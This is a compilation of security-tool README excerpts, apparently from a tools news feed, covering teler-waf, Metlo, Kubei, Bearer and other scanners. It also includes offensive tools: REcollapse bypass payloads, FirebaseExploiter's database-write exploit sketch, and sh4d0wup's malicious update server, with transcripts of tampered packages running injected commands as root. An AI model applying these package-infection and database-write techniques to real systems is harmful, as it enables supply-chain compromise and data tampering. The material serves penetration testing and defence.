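		// teler-waf attaches its unique request ID to rejected responses.
		fmt.Println("teler request id:", resp.Header.Get("X-Teler-Req-Id"))
	}
}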

Datasets

The teler-waf package utilizes a dataset of threats to identify and analyze each incoming request for potential security threats. This dataset is updated daily, which means that you will always have the latest resource. The dataset is initially stored in the user-level cache directory (on Unix systems, it returns $XDG_CACHE_HOME/teler-waf as specified by the XDG Base Directory Specification if non-empty, else $HOME/.cache/teler-waf. On Darwin, it returns $HOME/Library/Caches/teler-waf. On Windows, it returns %LocalAppData%/teler-waf. On Plan 9, it returns $home/lib/cache/teler-waf) on your first launch. Subsequent launches will utilize the cached dataset, rather than downloading it again.

Note: The threat datasets are obtained from the kitabisa/teler-resources repository.
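
The locations described above match Go's standard os.UserCacheDir; a quick sketch to print where the dataset would land on your system:

package main

import (
	"fmt"
	"os"
	"path/filepath"
)

func main() {
	dir, err := os.UserCacheDir() // $XDG_CACHE_HOME, ~/.cache, %LocalAppData%, etc.
	if err != nil {
		panic(err)
	}
	fmt.Println(filepath.Join(dir, "teler-waf"))
}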

However, there may be situations where you want to disable automatic updates to the threat dataset. For example, you may have a slow or limited internet connection, or you may be using a machine with restricted file access. In these cases, you can set an option called NoUpdateCheck to true, which will prevent the teler-waf from automatically updating the dataset.

// Create a new instance of the Teler type using the New
// function & disable automatic updates to the threat dataset.
telerMiddleware := teler.New(teler.Options{
NoUpdateCheck: true,
})

Finally, there may be cases where it's necessary to load the threat dataset into memory rather than saving it to a user-level cache directory. This can be particularly useful if you're running the application or service on a distroless or runtime image, where file access may be limited or slow. In this scenario, you can set an option called InMemory to true, which will load the threat dataset into memory for faster access.

// Create a new instance of the Teler type using the
// New function & enable in-memory threat datasets store.
telerMiddleware := teler.New(teler.Options{
InMemory: true,
})

Warning: This may also consume more system resources, so it's worth considering the trade-offs before making this decision.

Resources

Security

If you discover a security issue, please bring it to our attention right away; we take security seriously!

Reporting a Vulnerability

If you have information about a security issue or vulnerability in this teler-waf package, and/or you are able to successfully execute an attack such as cross-site scripting (XSS) and pop up an alert on our demo site (see resources), please do NOT file a public issue; instead, kindly send your report privately via the vulnerability report form or to our official channels as per our security policy.

Limitations

Here are some limitations of using teler-waf:

  • Performance overhead: teler-waf may introduce some performance overhead, as the teler-waf will need to process each incoming request. If you have a high volume of traffic, this can potentially slow down the overall performance of your application significantly, especially if you enable the CVEs threat detection. See benchmark below:
$ go test -bench . -cpu=4
goos: linux
goarch: amd64
pkg: github.com/kitabisa/teler-waf
cpu: 11th Gen Intel(R) Core(TM) i9-11900H @ 2.50GHz
BenchmarkTelerDefaultOptions-4 42649 24923 ns/op 6206 B/op 97 allocs/op
BenchmarkTelerCommonWebAttackOnly-4 48589 23069 ns/op 5560 B/op 89 allocs/op
BenchmarkTelerCVEOnly-4 48103 23909 ns/op 5587 B/op 90 allocs/op
BenchmarkTelerBadIPAddressOnly-4 47871 22846 ns/op 5470 B/op 87 allocs/op
BenchmarkTelerBadReferrerOnly-4 47558 23917 ns/op 5649 B/op 89 allocs/op
BenchmarkTelerBadCrawlerOnly-4 42138 24010 ns/op 5694 B/op 86 allocs/op
BenchmarkTelerDirectoryBruteforceOnly-4 45274 23523 ns/op 5657 B/op 86 allocs/op
BenchmarkTelerCustomRule-4 48193 22821 ns/op 5434 B/op 86 allocs/op
BenchmarkTelerWithoutCommonWebAttack-4 44524 24822 ns/op 6054 B/op 94 allocs/op
BenchmarkTelerWithoutCVE-4 46023 25732 ns/op 6018 B/op 93 allocs/op
BenchmarkTelerWithoutBadIPAddress-4 39205 25927 ns/op 6220 B/op 96 allocs/op
BenchmarkTelerWithoutBadReferrer-4 45228 24806 ns/op 5967 B/op 94 allocs/op
BenchmarkTelerWithoutBadCrawler-4 45806 26114 ns/op 5980 B/op 97 allocs/op
BenchmarkTelerWithoutDirectoryBruteforce-4 44432 25636 ns/op 6185 B/op 97 allocs/op
PASS
ok github.com/kitabisa/teler-waf 25.759s

Note: Benchmarking results may vary and may not be consistent. Those results were obtained when there were >1.5k CVE templates and the teler-resources dataset may have increased since then, which may impact the results.

  • Configuration complexity: Configuring teler-waf to suit the specific needs of your application can be complex, and may require a certain level of expertise in web security. This can make it difficult for those who are not familiar with application firewalls and IDS systems to properly set up and use teler-waf.
  • Limited protection: teler-waf is not a perfect security solution, and it may not be able to protect against all possible types of attacks. As with any security system, it is important to regularly monitor and maintain teler-waf to ensure that it is providing the desired level of protection.

Known Issues

To view a list of known issues with teler-waf, please filter the issues by the "known-issue" label.

License

This program is developed and maintained by members of Kitabisa Security Team, and this is not an officially supported Kitabisa product. This program is free software: you can redistribute it and/or modify it under the terms of the Apache license. Kitabisa teler-waf and any contributions are copyright ยฉ by Dwi Siswanto 2022-2023.



Suricata IDPE 6.0.12

Suricata is a network intrusion detection and prevention engine developed by the Open Information Security Foundation and its supporting vendors. The engine is multi-threaded and has native IPv6 support. It's capable of loading existing Snort rules and signatures and supports the Barnyard and Barnyard2 tools.

Metlo - An Open-Source API Security Platform

By: Zion3R

Secure Your API.


Metlo is an open-source API security platform

With Metlo you can:

  • Create an Inventory of all your API Endpoints and Sensitive Data.
  • Detect common API vulnerabilities.
  • Proactively test your APIs before they go into production.
  • Detect API attacks in real time.

Metlo does this by scanning your API traffic using one of our connectors and then analyzing trace data.


There are three ways to get started with Metlo. Metlo Cloud, Metlo Self Hosted, and our Open Source product. We recommend Metlo Cloud for almost all users as it scales to 100s of millions of requests per month and all upgrades and migrations are managed for you.

You can get started with Metlo Cloud right away without a credit card. Just make an account on https://app.metlo.com and follow the instructions in our docs here.

Although we highly recommend Metlo Cloud, if you're a large company or need an air-gapped system, you can self-host Metlo as well! Create an account on https://my.metlo.com and follow the instructions in our docs here to set up Metlo in your own cloud environment.

If you want to deploy our Open Source product we have instructions for AWS, GCP, Azure and Docker.

You can also join our Discord community if you need help or just want to chat!

Features

  • Endpoint Discovery - Metlo scans network traffic and creates an inventory of every single endpoint in your API.
  • Sensitive Data Scanning - Each endpoint is scanned for PII data and given a risk score.
  • Vulnerability Discovery - Get alerts for issues like unauthenticated endpoints returning sensitive data, no HSTS headers, PII data in URL params, Open API spec diffs, and more.
  • API Security Testing - Build security tests directly in Metlo. Autogenerate tests for OWASP Top 10 vulns like BOLA, Broken Authentication, SQL Injection and more.
  • CI/CD Integration - Integrate with your CI/CD to find issues in development and staging.
  • Attack Detection - Our ML Algorithms build a model for baseline API behavior. Any deviation from this baseline is surfaced to your security team as soon as possible.
  • Attack Context - Metlo's UI gives you full context around any attack to help quickly fix the vulnerability.

Testing

For tests that we can't autogenerate, our built-in testing framework helps you get to 100% security coverage on your highest risk APIs. You can build tests in a YAML format to make sure your API is working as intended.

For example the following test checks for broken authentication:

id: test-payment-processor-metlo.com-user-billing

meta:
  name: test-payment-processor.metlo.com/user/billing Test Auth
  severity: CRITICAL
  tags:
    - BROKEN_AUTHENTICATION

test:
  - request:
      method: POST
      url: https://test-payment-processor.metlo.com/user/billing
      headers:
        - name: Content-Type
          value: application/json
        - name: Authorization
          value: ...
      data: |-
        { "ccn": "...", "cc_exp": "...", "cc_code": "..." }
    assert:
      - key: resp.status
        value: 200
  - request:
      method: POST
      url: https://test-payment-processor.metlo.com/user/billing
      headers:
        - name: Content-Type
          value: application/json
      data: |-
        { "ccn": "...", "cc_exp": "...", "cc_code": "..." }
    assert:
      - key: resp.status
        value: [ 401, 403 ]
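
The same check can also be sketched outside Metlo's YAML runner. Below is a minimal, hypothetical Python equivalent using the requests library; the endpoint, token, and body are the placeholders from the example above:

import requests

url = "https://test-payment-processor.metlo.com/user/billing"
body = {"ccn": "...", "cc_exp": "...", "cc_code": "..."}

# With valid credentials the endpoint should accept the request.
ok = requests.post(url, json=body, headers={"Authorization": "..."})
assert ok.status_code == 200

# The same request without credentials must be rejected.
anon = requests.post(url, json=body)
assert anon.status_code in (401, 403), "possible broken authentication!"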

You can see more information on our docs.

Why Metlo?

Most businesses have adopted public facing APIs to power their websites and apps. This has dramatically increased the attack surface for your business. Thereโ€™s been a 200% increase in API security breaches in just the last year with the APIs of companies like Uber, Meta, Experian and Just Dial leaking millions of records. It's obvious that tools are needed to help security teams make APIs more secure but there's no great solution on the market.

Some solutions require you to go through sales calls to even try the product, while others have you send all your API traffic to their own cloud. Metlo is the first open-source API security platform that you can self-host, and you can get started for free right away!

We're Hiring!

We would love for you to come help us make Metlo better. Come join us at Metlo!

Open-source vs. paid

This repo is entirely MIT licensed. Features like user management, user roles and attack protection require an enterprise license. Contact us for more information.

Development

Checkout our development guide for more info on how to develop Metlo locally.



Kubei - A Flexible Kubernetes Runtime Scanner


Kubei is a vulnerability scanning tool that allows users to get an accurate and immediate risk assessment of their Kubernetes clusters. Kubei scans all images that are being used in a Kubernetes cluster, including images of application pods and system pods. It doesn't scan entire image registries and doesn't require preliminary integration with CI/CD pipelines.
It is a configurable tool which allows users to define the scope of the scan (target namespaces), the speed, and the vulnerability severity level of interest.
It provides a graphical UI which allows the viewer to identify where and what should be replaced in order to mitigate the discovered vulnerabilities.

Prerequisites
  1. A Kubernetes cluster is ready, and kubeconfig ( ~/.kube/config) is properly configured for the target cluster.

Required permissions
  1. Read secrets in cluster scope. This is required for getting image pull secrets for scanning private image repositories.
  2. List pods in cluster scope. This is required for calculating the target pods that need to be scanned.
  3. Create jobs in cluster scope. This is required for creating the jobs that will scan the target pods in their namespaces.

Configurations
The file deploy/kubei.yaml is used to deploy and configure Kubei on your cluster.
  1. Set the scan scope. Set the IGNORE_NAMESPACES env variable to ignore specific namespaces. Set TARGET_NAMESPACE to scan a specific namespace, or leave empty to scan all namespaces.
  2. Set the scan speed. Expedite scanning by running parallel scanners. Set the MAX_PARALLELISM env variable for the maximum number of simultaneous scanners.
  3. Set severity level threshold. Vulnerabilities with severity level higher than or equal to SEVERITY_THRESHOLD threshold will be reported. Supported levels are Unknown, Negligible, Low, Medium, High, Critical, Defcon1. Default is Medium.
  4. Set the delete job policy. Set the DELETE_JOB_POLICY env variable to define whether or not to delete completed scanner jobs. Supported values are:
    • All - All jobs will be deleted.
    • Successful - Only successful jobs will be deleted (default).
    • Never - Jobs will never be deleted.

Usage
  1. Run the following command to deploy Kubei on the cluster:
    kubectl apply -f https://raw.githubusercontent.com/Portshift/kubei/master/deploy/kubei.yaml
  2. Run the following command to verify that Kubei is up and running:
    kubectl -n kubei get pod -lapp=kubei
  3. Then, port forwarding into the Kubei webapp via the following command:
    kubectl -n kubei port-forward $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}') 8080
  4. In your browser, navigate to http://localhost:8080/view/, and then click 'GO' to run a scan.
  5. To check the state of Kubei, and the progress of ongoing scans, run the following command:
    kubectl -n kubei logs $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}')
  6. Refresh the page (http://localhost:8080/view/) to update the results.


Running Kubei with an external HTTP/HTTPS proxy
Uncomment and configure the proxy env variables for the Clair and Kubei deployments in deploy/kubei.yaml.

Limitations
  1. Supports Kubernetes Image Manifest V 2, Schema 2 (https://docs.docker.com/registry/spec/manifest-v2-2/). It will fail to scan on earlier versions.
  2. The CVE database will update once a day.


hardCIDR - Linux Bash Script To Discover The Netblocks, Or Ranges, Owned By The Target Organization

By: Zion3R


A Linux Bash script to discover the netblocks, or ranges, (in CIDR notation) owned by the target organization during the intelligence gathering phase of a penetration test. This information is maintained by the five Regional Internet Registries (RIRs):

ARIN (North America)
RIPE (Europe/Asia/Middle East)
APNIC (Asia/Pacific)
LACNIC (Latin America)
AfriNIC (Africa)

In addition to netblocks and IP addresses, Autonomous System Numbers (ASNs) are also of interest. ASNs are used as part of the Border Gateway Protocol (BGP) for uniquely identifying each network on the Internet. Target organizations may have their own ASNs due to the size of their network or as a result of redundant service paths from peered service providers. These ASNs will reveal additional netblocks owned by the organization.


Requirements

ipcalc (for RIPE, APNIC, LACNIC, AfriNIC queries)

LACNIC

A note on LACNIC before diving into the usage. LACNIC only allows querying by network range, ASN, Org Handle, or PoC Handle. This does not help us in locating these values based upon the organization name. They do, however, publish a list of all assigned ranges on a publicly accessible FTP server, along with their rate-limiting thresholds. So, there is an accompanying data file, which the script checks for, used to perform LACNIC queries locally. The script includes an update option, -r, that can be used to refresh this data on an interval of your choosing. Approximate run time is just shy of 28 hours.
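
As a rough illustration of the local-lookup idea (not the script's actual code): the RIR delegated stats files use a pipe-delimited format (registry|cc|type|start|value|date|status), and the CIDR conversion that hardCIDR delegates to ipcalc can be done in Python with the standard ipaddress module. The file name below is a placeholder for the script's data file:

import ipaddress

# Each IPv4 line gives a start address and an address count, not a prefix.
with open("lacnic-delegated-latest.txt") as fh:
    for line in fh:
        parts = line.strip().split("|")
        if len(parts) >= 7 and parts[2] == "ipv4":
            start = ipaddress.ip_address(parts[3])
            count = int(parts[4])
            # Summarize the range into one or more CIDR blocks.
            for net in ipaddress.summarize_address_range(start, start + count - 1):
                print(net)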

Usage

The script with no specified options will query ARIN and a pool of BGP route servers. The route server is selected at random at runtime. The -h option lists the help.

The options may be used in any combination, all, or none. Unfortunately, none of the โ€œotherโ€ RIRs note the actual CIDR notation of the range, so ipcalc is used to perform this function. If it is not installed on your system, the script will install it for you.

At the prompts, enter the organization name, the email domain, and whether country codes are used as part of the email. If answered Y to country codes, you will be prompted as to whether they precede the domain name or are appended to the TLD. A directory will be created for the output files in /tmp/. If the directory is found to exist, you will be prompted whether to overwrite. If answered N, a time stamp will be appended to the directory name.

The script queries each RIR, as well as a BGP route server, prompting along the way as to whether records were located. Upon completion, three files will be generated: a CSV based on Org Handle, a CSV based on PoC Handle, and a line-delimited file of all located ranges in CIDR notation.

Cancelling the script at any time will remove any temporary working files and the directory created for the resultant output files.

It should be noted that, due to similarity in some organization names, you could get back results not related to the target. The CSV files will provide the associated handles and URLs for further validation where necessary. It is also possible that employees of the target organization used their corporate email address to register their own domains. These will be found within the results as well.

Running with Docker

docker build -t hardcidr .

Building the hardcidr image

docker run -v $(pwd):/tmp -it hardcidr

Running the container. Output will be saved to current directory

Additional Information

For more information, check out the blog post on the TrustedSec website: Classy Inter-Domain Routing Enumeration



Clam AntiVirus Toolkit 1.1.0

Clam AntiVirus is an anti-virus toolkit for Unix. The main purpose of this software is the integration with mail servers (attachment scanning). The package provides a flexible and scalable multi-threaded daemon, a command-line scanner, and a tool for automatic updating via Internet. The programs are based on a shared library distributed with the Clam AntiVirus package, which you can use in your own software. This is the LTS source code release.

MIMEDefang Email Scanner 3.4.1

MIMEDefang is a flexible MIME email scanner designed to protect Windows clients from viruses. Includes the ability to do many other kinds of mail processing, such as replacing parts of messages with URLs. It can alter or delete various parts of a MIME message according to a very flexible configuration file. It can also bounce messages with unacceptable attachments. MIMEDefang works with the Sendmail 8.11 and newer "Milter" API, which makes it more flexible and efficient than procmail-based approaches.

REcollapse Is A Helper Tool For Black-Box Regex Fuzzing To Bypass Validations And Discover Normalizations In Web Applications

By: Zion3R


REcollapse is a helper tool for black-box regex fuzzing to bypass validations and discover normalizations in web applications.

It can also be helpful to bypass WAFs and weak vulnerability mitigations. For more information, take a look at the REcollapse blog post.

The goal of this tool is to generate payloads for testing. Actual fuzzing should be done with other tools like Burp (Intruder), ffuf, or similar.


Installation

Requirements: Python 3

pip3 install --user --upgrade -r requirements.txt or ./install.sh

Docker

docker build -t recollapse . or docker pull 0xacb/recollapse


Usage

$ recollapse -h
usage: recollapse [-h] [-p POSITIONS] [-e {1,2,3}] [-r RANGE] [-s SIZE] [-f FILE]
[-an] [-mn MAXNORM] [-nt]
[input]

REcollapse is a helper tool for black-box regex fuzzing to bypass validations and
discover normalizations in web applications

positional arguments:
input original input

options:
-h, --help show this help message and exit
-p POSITIONS, --positions POSITIONS
pivot position modes. Example: 1,2,3,4 (default). 1: starting,
2: separator, 3: normalization, 4: termination
-e {1,2,3}, --encoding {1,2,3}
1: URL-encoded format (default), 2: Unicode format, 3: Raw
format
-r RANGE, --range RANGE
range of bytes for fuzzing. Example: 0,0xff (default)
-s SIZE, --size SIZE number of fuzzing bytes (default: 1)
-f FILE, --file FILE read input from file
-an, --alphanum include alphanumeric bytes in fuzzing range
-mn MAXNORM, --maxnorm MAXNORM
maximum number of normalizations (default: 3)
-nt, --normtable print normalization table

Detailed options explanation

Let's consider this_is.an_example as the input.

Positions

  1. Fuzz the beginning of the input: $this_is.an_example
  2. Fuzz before and after special characters: this$_$is$.$an$_$example
  3. Fuzz normalization positions: replace all possible bytes according to the normalization table
  4. Fuzz the end of the input: this_is.an_example$
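
For illustration, here is a stripped-down Python sketch of position modes 1, 2, and 4 (URL-encoded output, a deliberately small byte range, and no normalization handling); it is not the tool's actual implementation:

import re

def generate(inp, byte_range=range(0x01, 0x10)):
    payloads = []
    # Pivots: start of input (mode 1), around separators (mode 2), end (mode 4).
    pivots = {0, len(inp)}
    for m in re.finditer(r"[^a-zA-Z0-9]", inp):
        pivots.update((m.start(), m.end()))
    for i in sorted(pivots):
        for b in byte_range:
            payloads.append(inp[:i] + "%%%02x" % b + inp[i:])
    return payloads

print(generate("this_is.an_example")[:5])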

Encoding

  1. URL-encoded format to be used with application/x-www-form-urlencoded or query parameters: %22this_is.an_example
  2. Unicode format to be used with application/json: \u0022this_is.an_example
  3. Raw format to be used with multipart/form-data: "this_is.an_example

Range

Specify a range of bytes for fuzzing: -r 1-127. This will exclude alphanumeric characters unless the -an option is provided.

Size

Specify the size of fuzzing for positions 1, 2 and 4. The default approach is to fuzz all possible values for one byte. Increasing the size will consume more resources and generate many more inputs, but it can lead to finding new bypasses.

File

Input can be provided as a positional argument, stdin, or a file through the -f option.

Alphanumeric

By default, alphanumeric characters will be excluded from output generation, which is usually not interesting in terms of responses. You can allow this with the -an option.

Maximum number of normalizations

Not all normalization libraries have the same behavior. By default, three possibilities for normalizations are generated for each input index, which is usually enough. Use the -mn option to go further.

Normalization table

Use the -nt option to show the normalization table.


Example

$ recollapse -e 1 -p 1,2,4 -r 10-11 https://legit.example.com
%0ahttps://legit.example.com
%0bhttps://legit.example.com
https%0a://legit.example.com
https%0b://legit.example.com
https:%0a//legit.example.com
https:%0b//legit.example.com
https:/%0a/legit.example.com
https:/%0b/legit.example.com
https://%0alegit.example.com
https://%0blegit.example.com
https://legit%0a.example.com
https://legit%0b.example.com
https://legit.%0aexample.com
https://legit.%0bexample.com
https://legit.example%0a.com
https://legit.example%0b.com
https://legit.example.%0acom
https://legit.example.%0bcom
https://legit.example.com%0a
https://legit.example.com%0b

Resources

This technique was presented at BSidesLisbon 2022.

Blog post: https://0xacb.com/2022/11/21/recollapse/


Normalization table: https://0xacb.com/normalization_table





Sh4D0Wup - Signing-key Abuse And Update Exploitation Framework


Signing-key abuse and update exploitation framework.

% docker run -it --rm ghcr.io/kpcyrd/sh4d0wup:edge -h
Usage: sh4d0wup [OPTIONS] <COMMAND>

Commands:
bait Start a malicious update server
front Bind a http/https server but forward everything unmodified
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Interact with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
req Emulate a http request to test routing and selectors
completions Generate shell completions
help Print this message or the help of the given subcommand(s)

Options:
-v, --verbose... Increase logging output (can be used multiple times)
-q, --quiet... Reduce logging output (can be used multiple times)
-h, --help Print help information
-V, --version Print version information

What are shadow updates?

Have you ever wondered if the update you downloaded is the same one everybody else gets, or whether you got a different one that was made just for you? Shadow updates are updates that officially don't exist but carry valid signatures and would get accepted by clients as genuine. This may happen if the signing key is compromised by hackers or if a release engineer with legitimate access turns grimy.

sh4d0wup is a malicious http/https update server that acts as a reverse proxy in front of a legitimate server and can infect + sign various artifact formats. Attacks are configured in plots that describe how http request routing works, how artifacts are patched/generated, how they should be signed and with which key. A route can have selectors so it matches only if e.g. the user-agent matches a pattern or if the client is connecting from a specific IP address. For development and testing, mock signing keys/certificates can be generated and marked as trusted.

Compile a plot

Some plots are more complex to run than others; to avoid long startup times due to downloads and artifact patching, you can build a plot in advance. This also allows signatures to be created in advance.

sh4d0wup build ./contrib/plot-hello-world.yaml -o ./plot.tar.zst

Run a plot

This spawns a malicious http update server according to the plot. This also accepts yaml files but they may take longer to start.

sh4d0wup bait -B 0.0.0.0:1337 ./plot.tar.zst

You can find examples here:

Infect an artifact

sh4d0wup infect elf

% sh4d0wup infect elf /usr/bin/sh4d0wup -c id a.out
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Spawning C compiler...
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Generating source code...
[2022-12-19T23:50:57Z INFO sh4d0wup::infect::elf] Waiting for compile to finish...
[2022-12-19T23:51:01Z INFO sh4d0wup::infect::elf] Successfully generated binary
% ./a.out help
uid=1000(user) gid=1000(user) groups=1000(user),212(rebuilderd),973(docker),998(wheel)
Usage: a.out [OPTIONS] <COMMAND>

Commands:
bait Start a malicious update server
infect High level tampering, inject additional commands into a package
tamper Low level tampering, patch a package database to add malicious packages, cause updates or influence dependency resolution
keygen Generate signing keys with the given parameters
sign Use signing keys to generate signatures
hsm Interact with hardware signing keys
build Compile an attack based on a plot
check Check if the plot can still execute correctly against the configured image
completions Generate shell completions
help Print this message or the help of the given subcommand(s)

Options:
-v, --verbose... Turn debugging information on
-h, --help Print help information

sh4d0wup infect pacman

% sh4d0wup infect pacman --set 'pkgver=0.2.0-2' /var/cache/pacman/pkg/sh4d0wup-0.2.0-1-x86_64.pkg.tar.zst -c id sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
[2022-12-09T16:08:11Z INFO sh4d0wup::infect::pacman] This package has no install hook, adding one from scratch...
% sudo pacman -U sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
loading packages...
resolving dependencies...
looking for conflicting packages...

Packages (1) sh4d0wup-0.2.0-2

Total Installed Size: 13.36 MiB
Net Upgrade Size: 0.00 MiB

:: Proceed with installation? [Y/n]
(1/1) checking keys in keyring [#######################################] 100%
(1/1) checking package integrity [#######################################] 100%
(1/1) loading package files [#######################################] 100%
(1/1) checking for file conflicts [#######################################] 100%
(1/1) checking available disk space [#######################################] 100%
:: Processing package changes...
(1/1) upgrading sh4d0wup [#######################################] 100%
uid=0(root) gid=0(root) groups=0(root)
:: Running post-transaction hooks...
(1/2) Arming ConditionNeedsUpdate...
(2/2) Notifying arch-audit-gtk

sh4d0wup infect deb

% sh4d0wup infect deb /var/cache/apt/archives/apt_2.2.4_amd64.deb -c id ./apt_2.2.4-1_amd64.deb --set Version=2.2.4-1
[2022-12-09T16:28:02Z INFO sh4d0wup::infect::deb] Patching "control.tar.xz"
% sudo apt install ./apt_2.2.4-1_amd64.deb
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Note, selecting 'apt' instead of './apt_2.2.4-1_amd64.deb'
Suggested packages:
apt-doc aptitude | synaptic | wajig dpkg-dev gnupg | gnupg2 | gnupg1 powermgmt-base
Recommended packages:
ca-certificates
The following packages will be upgraded:
apt
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 0 B/1491 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 /apt_2.2.4-1_amd64.deb apt amd64 2.2.4-1 [1491 kB]
debconf: delaying package configuration, since apt-utils is not installed
(Reading database ... 6661 files and directories currently installed.)
Preparing to unpack /apt_2.2.4-1_amd64.deb ...
Unpacking apt (2.2.4-1) over (2.2.4) ...
Setting up apt (2.2.4-1) ...
uid=0(root) gid=0(root) groups=0(root)
Processing triggers for libc-bin (2.31-13+deb11u5) ...

sh4d0wup infect oci

Bruteforce git commit partial collisions

Here's a short oneliner that takes the latest commit from a git repository, sends it to a remote computer that has sh4d0wup installed, tweaks it until the commit id starts with the provided --collision-prefix, and then inserts the new commit back into the repository on your local computer:

% git cat-file commit HEAD | ssh lots-o-time nice sh4d0wup tamper git-commit --stdin --collision-prefix 7777 --strip-header | git hash-object -w -t commit --stdin

This may take some time; eventually it shows a commit id that you can use to create a new branch:

git show 777754fde8...
git branch some-name 777754fde8...
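
For intuition, here is a hedged Python sketch of the underlying brute force: a commit id is the SHA-1 of "commit <size>\0" plus the raw commit body, so appending a varying dummy header and rehashing until the digest starts with the desired prefix finds a partial collision. (The header trick is one possible mutation; the exact tweak sh4d0wup applies may differ.)

import hashlib, itertools

def find_collision(commit_body: bytes, prefix: str) -> bytes:
    for nonce in itertools.count():
        # Insert a dummy header before the blank line that separates
        # headers from the commit message.
        candidate = commit_body.replace(b"\n\n", b"\nnonce %d\n\n" % nonce, 1)
        # A commit id is the SHA-1 of "commit <size>\0" + body.
        data = b"commit %d\x00" % len(candidate) + candidate
        if hashlib.sha1(data).hexdigest().startswith(prefix):
            return candidate

# Feed it the output of `git cat-file commit HEAD`, then store the result
# with `git hash-object -w -t commit --stdin`.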


FirebaseExploiter - Vulnerability Discovery Tool That Discovers Firebase Database Which Are Open And Can Be Exploitable


FirebaseExploiter is a vulnerability discovery tool that discovers Firebase databases which are open and exploitable. Primarily built for mass hunting bug bounties and for penetration testing.

Features

  • Mass vulnerability scanning from list of hosts
  • Custom JSON data in exploit.json to upload during exploit
  • Custom URI path for exploit

Usage

This will display help for the CLI tool. Here are all the required arguments it supports.

Installation

FirebaseExploiter was built using go1.19. Make sure you use the latest version of Go to install successfully. Run the following command to install the latest version:

go install -v github.com/securebinary/firebaseExploiter@latest

Running FirebaseExploiter

To scan a specific domain to check for Insecure Firebase DB.

To exploit a Firebase DB to write your own JSON document in it.

Create your own exploit.json file in proper JSON format to exploit vulnerable Firebase DBs.

Checking the exploited URL to verify the vulnerability.

Adding custom path for exploiting Firebase DBs.

Mass scanning for Insecure Firebase Databases from list of target hosts.

Exploiting vulnerable Firebase DBs from the list of target hosts.
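
The underlying technique is simple enough to sketch. An open Firebase Realtime Database answers unauthenticated REST calls, so a read check is a GET on /.json and the write exploit is a PUT on an arbitrary path. A hedged Python sketch of this (the database URL and payload are placeholders, and this is not the tool's actual code):

import requests

db = "https://example-project.firebaseio.com"

# Readable: an open database answers GET /.json with its contents (or null).
r = requests.get(db + "/.json", timeout=10)
print("readable:", r.status_code == 200)

# Writable: an open database accepts a PUT on any path.
r = requests.put(db + "/poc.json", json={"poc": "security test"}, timeout=10)
print("writable:", r.status_code == 200)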

License

FirebaseExploiter is made with love by the SecureBinary team. Any tweaks / community contributions are welcome.


Bearer - Code Security Scanning Tool (SAST) That Discover, Filter And Prioritize Security Risks And Vulnerabilities Leading To Sensitive Data Exposures (PII, PHI, PD)


Discover, filter, and prioritize security risks and vulnerabilities impacting your code.

Bearer is a static application security testing (SAST) tool that scans your source code and analyzes your data flows to discover, filter and prioritize security risks and vulnerabilities leading to sensitive data exposures (PII, PHI, PD).

Currently supporting JavaScript and Ruby stacks.

Code security scanner that natively filters and prioritizes security risks using sensitive data flow analysis.

Bearer provides built-in rules against a common set of security risks and vulnerabilities, known as OWASP Top 10. Here are some practical examples of what those rules look for:

  • Non-filtered user input.
  • Leakage of sensitive data through cookies, internal loggers, third-party logging services, and into analytics environments.
  • Usage of weak encryption libraries or misusage of encryption algorithms.
  • Unencrypted incoming and outgoing communication (HTTP, FTP, SMTP) of sensitive information.
  • Hard-coded secrets and tokens.

And many more.

Bearer is Open Source (see license) and fully customizable, from creating your own rules to component detection (database, API) and data classification.

Bearer also powers our commercial offering, Bearer Cloud, allowing security teams to scale and monitor their application security program using the same engine.

Getting started

Discover your most critical security risks and vulnerabilities in only a few minutes. In this guide, you will install Bearer, run a scan on a local project, and view the results. Let's get started!

Install Bearer

The quickest way to install Bearer is with the install script. It will auto-select the best build for your architecture, and defaults the installation to ./bin and to the latest release version:

curl -sfL https://raw.githubusercontent.com/Bearer/bearer/main/contrib/install.sh | sh

Other install options


Homebrew

Using Bearer's official Homebrew tap:

brew install bearer/tap/bearer

Debian/Ubuntu
$ sudo apt-get install apt-transport-https
$ echo "deb [trusted=yes] https://apt.fury.io/bearer/ /" | sudo tee -a /etc/apt/sources.list.d/fury.list
$ sudo apt-get update
$ sudo apt-get install bearer

RHEL/CentOS

Add repository setting:

$ sudo vim /etc/yum.repos.d/fury.repo
[fury]
name=Gemfury Private Repo
baseurl=https://yum.fury.io/bearer/
enabled=1
gpgcheck=0

Then install with yum:

$ sudo yum -y update
$ sudo yum -y install bearer

Docker

Bearer is also available as a Docker image on Docker Hub and ghcr.io.

With docker installed, you can run the following command with the appropriate paths in place of the examples.

docker run --rm -v /path/to/repo:/tmp/scan bearer/bearer:latest-amd64 scan /tmp/scan

Additionally, you can use docker compose. Add the following to your docker-compose.yml file and replace the volumes with the appropriate paths for your project:

version: "3"
services:
bearer:
platform: linux/amd64
image: bearer/bearer:latest-amd64
volumes:
- /path/to/repo:/tmp/scan

Then, run the docker compose run command to run Bearer with any specified flags:

docker compose run bearer scan /tmp/scan --debug

Binary

Download the archive file for your operating system/architecture from here.

Unpack the archive, and put the binary somewhere in your $PATH (on UNIX-y systems, /usr/local/bin or the like). Make sure it has permission to execute.


Scan your project

The easiest way to try out Bearer is with our example project, Bear Publishing. It simulates a realistic Ruby application with common security flaws. Clone or download it to a convenient location to get started.

git clone https://github.com/Bearer/bear-publishing.git

Now, run the scan command with bearer scan on the project directory:

bearer scan bear-publishing

A progress bar will display the status of the scan.

Once the scan is complete, Bearer will output a security report with details of any rule failures, as well as where in the codebase the infractions happened and why.

By default the scan command uses the SAST scanner; other scanner types are available.

Analyze the report

The security report is an easily digestible view of the security issues detected by Bearer. A report is made up of:

  • The list of rules run against your code.
  • Each detected failure, containing the file location and lines that triggered the rule failure.
  • A stats section with a summary of rule checks, failures, and warnings.

The Bear Publishing example application will trigger rule failures and output a full report. Here's a section of the output:

...
CRITICAL: Only communicate using SFTP connections.
